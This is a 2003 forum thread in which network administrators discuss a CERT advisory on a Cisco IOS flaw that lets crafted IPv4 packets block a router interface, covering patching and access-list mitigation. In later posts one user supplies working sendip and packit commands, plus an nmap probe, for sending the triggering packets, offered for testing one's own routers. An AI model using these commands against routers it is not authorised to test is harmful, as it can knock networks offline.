Re: CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet

Discussion in 'Cisco' started by Alan Lee, Jul 17, 2003.

  1. Alan Lee

    Alan Lee Guest

    Anybody read the latest advisory from CERT?
     
    Alan Lee, Jul 17, 2003
    #1
    1. Advertising

  2. Alan Lee

    James black Guest

    "Alan Lee" <> wrote in message news:<3f1631be$>...
    > Anybody read the latest advisory from CERT?

    I've read the advisory. It doesn't sound like cisco really has it
    fixed, their site indicates that the workaround only permits an
    affected router to be reloaded by adding a new value called
    hold-queue.

    see below from http://www.cisco.com/en/US/products...ducts_security_advisory09186a00801a34c2.shtml

    Workarounds
    AFTER APPLYING THE WORKAROUND the input queue depth may be raised with
    the hold-queue <new value> in interface command -- the default size is
    75. This will allow traffic flow on the interface until the device can
    be reloaded.
     
    James black, Jul 17, 2003
    #2
    1. Advertising

  3. I have, i know Globix are scheduling IOS updates this evening to stop
    the possibilty am sure this board is quiet because every one is off
    TFTPing images all day, much like my self.

    "Alan Lee" <> wrote in message news:<3f1631be$>...
    > Anybody read the latest advisory from CERT?
     
    Stephen Evans, Jul 17, 2003
    #3
  4. Alan Lee

    Bill F Guest

    Re: CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4Packet

    I just did. It's a bit ambiguous in it's description. "...rare sequence
    of crafted IPv4 packets.." Couldn't they be more specific? Will a pix
    or IDS system block such an attack? It seems as though this is a risk
    to perimeter devices only. Is there really any need to be concerned
    with internal devices, i.e. privately addressed devices behind a firewall?

    I also find it interesting that there are images with a fix that
    pre-date this advisory. Was it a known bug that was just discovered to
    be a security risk? The advisory says there are no known exploitations
    of the vulnerability.

    Alan Lee wrote:
    > Anybody read the latest advisory from CERT?
    >
    >
     
    Bill F, Jul 17, 2003
    #4
  5. Alan Lee

    Chris Guest

    "Alan Lee" <> wrote in message
    news:3f1631be$...
    > Anybody read the latest advisory from CERT?
    >


    Hmmm .... downloads from Cisco were running quite slow today. Looks like my
    trusty TFTP server will be working some overtime along with me ;-)
     
    Chris, Jul 17, 2003
    #5
  6. Also what is ambiguous is the phrase "sent directly to the device".
    What type of packets are sent directly to a device? I would say that
    device management protocols such as telnet and SNMP go directly to the
    router. But are packets routed by a router considered being sent
    directly to the device? And what type of packets would be classified
    as being indirectly sent to an IOS device?

    Bill F <> wrote in message news:<>...
    > I just did. It's a bit ambiguous in it's description. "...rare sequence
    > of crafted IPv4 packets.." Couldn't they be more specific? Will a pix
    > or IDS system block such an attack? It seems as though this is a risk
    > to perimeter devices only. Is there really any need to be concerned
    > with internal devices, i.e. privately addressed devices behind a firewall?
    >
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    > Alan Lee wrote:
    > > Anybody read the latest advisory from CERT?
    > >
    > >
     
    Steve Himebaugh, Jul 17, 2003
    #6
  7. In article <>,
    Steve Himebaugh <> wrote:
    >Also what is ambiguous is the phrase "sent directly to the device".
    >What type of packets are sent directly to a device? I would say that
    >device management protocols such as telnet and SNMP go directly to the
    >router. But are packets routed by a router considered being sent
    >directly to the device? And what type of packets would be classified
    >as being indirectly sent to an IOS device?


    I interpret that as meaning "whose destination address is the device". And
    in this case, the types of packets that would be sent directly to the
    device are the carefully-crafted packets from someone trying to make the
    router fail. All he has to do is look at a traceroute to find the
    addresses of lots of routers, and then send exploit packets to them.

    --
    Barry Margolin,
    Level(3), Woburn, MA
    *** DON'T SEND TECHNICAL QUESTIONS DIRECTLY TO ME, post them to newsgroups.
    Please DON'T copy followups to me -- I'll assume it wasn't posted to the group.
     
    Barry Margolin, Jul 17, 2003
    #7
  8. Re: CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4Packet

    The internal threat assessment is really up to you. My concern, depending on
    the size of your infrastructure, is that once more public information becomes
    available this exploit could then be designed as some type of worm. As a
    result any laptop that enters your company, such as a contractor or mobile
    user, could unknowingly cause you serious grief.


    David Wolfenbarger
    ----------
    Bill F <> wrote...

    > I just did. It's a bit ambiguous in it's description. "...rare sequence
    > of crafted IPv4 packets.." Couldn't they be more specific? Will a pix
    > or IDS system block such an attack? It seems as though this is a risk
    > to perimeter devices only. Is there really any need to be concerned
    > with internal devices, i.e. privately addressed devices behind a firewall?
    >
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    > Alan Lee wrote:
    > > Anybody read the latest advisory from CERT?
    > >
    > >

    >
     
    David Wolfenbarger, Jul 18, 2003
    #8
  9. Alan Lee

    Dave Phelps Guest

    Re: CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet

    In article <>, says...
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    >

    Why is that suprising? Most vendors, including Cisco, are aware of bugs/issues prior to
    the formal announcement. This gives them time to develop resolutions before the
    information becomes common knowledge. The alternative, vendors announcing the problem
    without patches available, would be much worse.

    Less common is the attack that is discovered and exploited by a cracker prior to a
    vendor's knowledge of the vulnerability.

    --
    Dave Phelps
    DD Networks
    www.ddnets.com
    deadspam=tippenring
     
    Dave Phelps, Jul 18, 2003
    #9
  10. Alan Lee

    CybrSage Guest

    If you read cisco's advisory, you will see there are many versions of IOS
    that are not able to be exploited by this. All the 12.3 IOSs are safe.

    Directly sent to device means using the devices IP address, such as if you
    wanted to telnet into the router via the Internet to configure it.

    "Alan Lee" <> wrote in message
    news:3f1631be$...
    > Anybody read the latest advisory from CERT?
    >
    >
     
    CybrSage, Jul 18, 2003
    #10
  11. They have updated the paper describing this at
    http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml

    <QUOTE> Cisco routers are configured to process and accept Internet Protocol
    version 4 (IPv4) packets by default. A rare, specially crafted sequence of
    IPv4 packets with protocol type 53 (SWIPE), 55 (IP Mobility), 77 (Sun ND),
    or 103 (Protocol Independent Multicast - PIM) which is handled by the
    processor on a Cisco IOS device may force the device to incorrectly flag the
    input queue on an interface as full, which will cause the router to stop
    processing inbound traffic on that interface. This can cause routing
    protocols to drop due to dead timers. <UNQUOTE>

    I use to add access lists allowing only the peers or my management station
    to access the IP addresses attributed to any interface on the router.
    Transit traffic does not get filtered by this. After Cisco disclosed those
    ports, hackers seem to have started targetting....

    Peter B


    "Bill F" <> wrote in message
    news:...
    > I just did. It's a bit ambiguous in it's description. "...rare sequence
    > of crafted IPv4 packets.." Couldn't they be more specific? Will a pix
    > or IDS system block such an attack? It seems as though this is a risk
    > to perimeter devices only. Is there really any need to be concerned
    > with internal devices, i.e. privately addressed devices behind a firewall?
    >
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    > Alan Lee wrote:
    > > Anybody read the latest advisory from CERT?
    > >
    > >

    >
     
    Peter Buelens, Jul 18, 2003
    #11
  12. On Thu, 17 Jul 2003 18:49:46 GMT, Bill F <> wrote:

    >I just did. It's a bit ambiguous in it's description. "...rare sequence
    >of crafted IPv4 packets.." Couldn't they be more specific?


    If they were they would increase the chances of an attack.


    Also note that if any genuine packets to the interface get into the middle of
    the sequence, the exploitt will fail.

    Paul.
     
    Paul Matthews, Jul 21, 2003
    #12
  13. On Thu, 17 Jul 2003 22:43:42 GMT, Barry Margolin <>
    wrote:

    >I interpret that as meaning "whose destination address is the device".


    Yup. Confirmed by my SE.

    In a well protected network, the routers should already be protected from
    traffic to the router from unknown sources.
    --
    Paul Matthews CCIE #4063
     
    Paul Matthews, Jul 21, 2003
    #13
  14. Hi,

    "Bill F" <> wrote in message
    news:...
    > I just did. It's a bit ambiguous in it's description. "...rare sequence
    > of crafted IPv4 packets.." Couldn't they be more specific?


    According to:
    http://www.netsys.com/cgi-bin/displaynews?a=611
    There is no "Special Crafted" packet needed for the exploit to occour.

    Which make me wonder, what type of application could I use to test/verify
    the presence of the bug on my routers ?
    Any ideas ?

    Regards
    Martin Bilgrav


    > Will a pix
    > or IDS system block such an attack? It seems as though this is a risk
    > to perimeter devices only. Is there really any need to be concerned
    > with internal devices, i.e. privately addressed devices behind a firewall?
    >
    > I also find it interesting that there are images with a fix that
    > pre-date this advisory. Was it a known bug that was just discovered to
    > be a security risk? The advisory says there are no known exploitations
    > of the vulnerability.
    >
    > Alan Lee wrote:
    > > Anybody read the latest advisory from CERT?
    > >
    > >

    >
     
    Martin Bilgrav, Jul 22, 2003
    #14
  15. Thx for the tip, though I do not run unix.
    Regards
    Martin

    "fugi" <> wrote in message
    news:...
    > Martin Bilgrav <> wrote:
    > > Hi,

    >
    > do you run unix? if so use packit, hping or sendip. I prefer sendip.
    > such as...
    >
    > sendip -f payload -p ipv4 -iy 0 -ii 0 -ifd 0 -it <ttl> -ip 53 -is <src

    addr> -id <dst addr> <dst addr>
    >
    > file payload can be anything or ommited. all those flags aren't
    > necessary, I just wanted to specify and not rely on defaults.
    >
    > here's the packit example
    >
    > packit -t RAWIP -V 53 -d <dst addr> -T <ttl>
    >
    > the TTL must be 0 when it reaches the interface.
    >
    > I also wrote some C source that does it, a lil faster and more debuging.
    >
    > note that all 4 protocols are not necessary. everyone seemed to
    > miss the work *OR* in Cisco's release.
    >
    > and if it's across the net do an nmap -v -sO <dst addr> to make
    > sure those protocols aren't filtered, which has been the case with
    > many providers across their nets.
    >
    > if you have anything else as I don't often read this group.
    >
    > > "Bill F" <> wrote in message
    > > news:...
    > >> I just did. It's a bit ambiguous in it's description. "...rare

    sequence
    > >> of crafted IPv4 packets.." Couldn't they be more specific?

    >
    > > According to:
    > > http://www.netsys.com/cgi-bin/displaynews?a=611
    > > There is no "Special Crafted" packet needed for the exploit to occour.

    >
    > > Which make me wonder, what type of application could I use to

    test/verify
    > > the presence of the bug on my routers ?
    > > Any ideas ?

    >
    > > Regards
    > > Martin Bilgrav

    >
    >
    > >> Will a pix
    > >> or IDS system block such an attack? It seems as though this is a risk
    > >> to perimeter devices only. Is there really any need to be concerned
    > >> with internal devices, i.e. privately addressed devices behind a

    firewall?
    > >>
    > >> I also find it interesting that there are images with a fix that
    > >> pre-date this advisory. Was it a known bug that was just discovered to
    > >> be a security risk? The advisory says there are no known exploitations
    > >> of the vulnerability.
    > >>
    > >> Alan Lee wrote:
    > >> > Anybody read the latest advisory from CERT?
    > >> >
    > >> >
    > >>

    >
    >
    >
    > --
    > The complexity of a weapon is inversely proportional to the IQ of
    > the weapon's operator.
     
    Martin Bilgrav, Jul 23, 2003
    #15
  16. Alan Lee

    fugi Guest

    Martin Bilgrav <> wrote:
    > Thx for the tip, though I do not run unix.
    > Regards
    > Martin


    no better time to start than now then. freebsd.org netbsd.org
    openbsd.org Solaris is ported to x86 or I got an old 50MHz HP
    running HP-UX 11, QNX will run embedded in a toaster, or you could
    pop linux on a spare harddrive and use it for diagnostics like so
    and packet sniffing.

    > "fugi" <> wrote in message
    > news:...
    >> Martin Bilgrav <> wrote:
    >> > Hi,

    >>
    >> do you run unix? if so use packit, hping or sendip. I prefer sendip.
    >> such as...
    >>
    >> sendip -f payload -p ipv4 -iy 0 -ii 0 -ifd 0 -it <ttl> -ip 53 -is <src

    > addr> -id <dst addr> <dst addr>
    >>
    >> file payload can be anything or ommited. all those flags aren't
    >> necessary, I just wanted to specify and not rely on defaults.
    >>
    >> here's the packit example
    >>
    >> packit -t RAWIP -V 53 -d <dst addr> -T <ttl>
    >>
    >> the TTL must be 0 when it reaches the interface.
    >>
    >> I also wrote some C source that does it, a lil faster and more debuging.
    >>
    >> note that all 4 protocols are not necessary. everyone seemed to
    >> miss the work *OR* in Cisco's release.
    >>
    >> and if it's across the net do an nmap -v -sO <dst addr> to make
    >> sure those protocols aren't filtered, which has been the case with
    >> many providers across their nets.
    >>
    >> if you have anything else as I don't often read this group.
    >>
    >> > "Bill F" <> wrote in message
    >> > news:...
    >> >> I just did. It's a bit ambiguous in it's description. "...rare

    > sequence
    >> >> of crafted IPv4 packets.." Couldn't they be more specific?

    >>
    >> > According to:
    >> > http://www.netsys.com/cgi-bin/displaynews?a=611
    >> > There is no "Special Crafted" packet needed for the exploit to occour.

    >>
    >> > Which make me wonder, what type of application could I use to

    > test/verify
    >> > the presence of the bug on my routers ?
    >> > Any ideas ?

    >>
    >> > Regards
    >> > Martin Bilgrav

    >>
    >>
    >> >> Will a pix
    >> >> or IDS system block such an attack? It seems as though this is a risk
    >> >> to perimeter devices only. Is there really any need to be concerned
    >> >> with internal devices, i.e. privately addressed devices behind a

    > firewall?
    >> >>
    >> >> I also find it interesting that there are images with a fix that
    >> >> pre-date this advisory. Was it a known bug that was just discovered to
    >> >> be a security risk? The advisory says there are no known exploitations
    >> >> of the vulnerability.
    >> >>
    >> >> Alan Lee wrote:
    >> >> > Anybody read the latest advisory from CERT?
    >> >> >
    >> >> >
    >> >>

    >>
    >>
    >>
    >> --
    >> The complexity of a weapon is inversely proportional to the IQ of
    >> the weapon's operator.




    --
    The complexity of a weapon is inversely proportional to the IQ of
    the weapon's operator.
     
    fugi, Jul 23, 2003
    #16
  17. "fugi" <> wrote in message
    news:...

    > no better time to start than now then. freebsd.org netbsd.org
    > openbsd.org Solaris is ported to x86 or I got an old 50MHz HP
    > running HP-UX 11, QNX will run embedded in a toaster, or you could
    > pop linux on a spare harddrive and use it for diagnostics like so
    > and packet sniffing.


    LOL - Yeah , I know, Fugi ...
    Just never did have time enough to get to learn unix in depth enough to use
    is as a powertool.
    I have tried QNX booted from single floppy though, with internet dialer and
    browser !
    Amazing - all on a floppy ! really rox !
    I know QNX is used industial in alot more stuff than you can image.

    Take care !

    BR
    Martin
     
    Martin Bilgrav, Jul 23, 2003
    #17
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Markus Zielonka
    Replies:
    1
    Views:
    515
    Mike P
    Jul 18, 2003
  2. John
    Replies:
    3
    Views:
    449
    Pavlov
    Jul 25, 2003
  3. Pavlov
    Replies:
    0
    Views:
    444
    Pavlov
    Apr 21, 2004
  4. Bill Gates...not!  Email w/o whitelist in the subj

    MISSING Cisco Security Advisory: IPv6 Crafted Packet Vulnerability

    Bill Gates...not! Email w/o whitelist in the subj, Aug 1, 2005, in forum: Cisco
    Replies:
    1
    Views:
    456
    Martin Bilgrav
    Aug 1, 2005
  5. Boomer
    Replies:
    1
    Views:
    800
    Hugh Lilly
    Aug 27, 2003
Loading...

Share This Page